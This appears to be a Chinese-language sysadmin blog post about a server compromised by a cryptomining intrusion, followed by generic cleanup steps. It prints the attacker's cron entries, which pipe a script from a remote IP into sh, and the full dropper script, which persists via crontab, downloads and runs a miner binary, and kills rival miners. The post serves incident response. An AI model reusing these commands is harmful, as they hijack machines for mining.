最近公司的一個服務器cpu占用比較高,定時任務出現問題,后來發現竟然給入侵了,用來跑比特幣挖礦,特意分享下挖礦腳本
平時寫點腳本定時任務備份數據庫,最近登上服務器,才發現crontab被串改了。我寫的定時腳本給刪了。。。
就奇怪了,無端端多了幾個計划任務
crontab -l 查看多了幾個定時任務:
[root@hknavi ~]# crontab -l */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
開始還以為公司那位干的定時任務,我就研究下干什么,查了一下發現是印度IP,發現服務器入侵了
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
后來查詢一下竟然發現是挖礦腳本,知道了事情的嚴重性,查看腳本跑的事件
curl -fsSL http://218.248.40.228:8443/i.sh 查看挖礦腳本:
[root@hknavi ~]# curl -fsSL http://218.248.40.228:8443/i.sh export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.2020" ]; then curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020 fi if [ ! -f "/tmp/ddg.2020" ]; then wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020 fi chmod +x /tmp/ddg.2020 && /tmp/ddg.2020 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
的確發現 有 入侵文件
問題比較嚴重,最后解決辦法
1. 、停掉計划任務:
2、查看暴力破解的記錄,發現並沒有異常,並刪除掉
3、查看異常進程,kill異常進程
4、文件處理,刪除異常文件
5、修改登錄密碼
6、防火牆安全性提高
7、入侵警報等等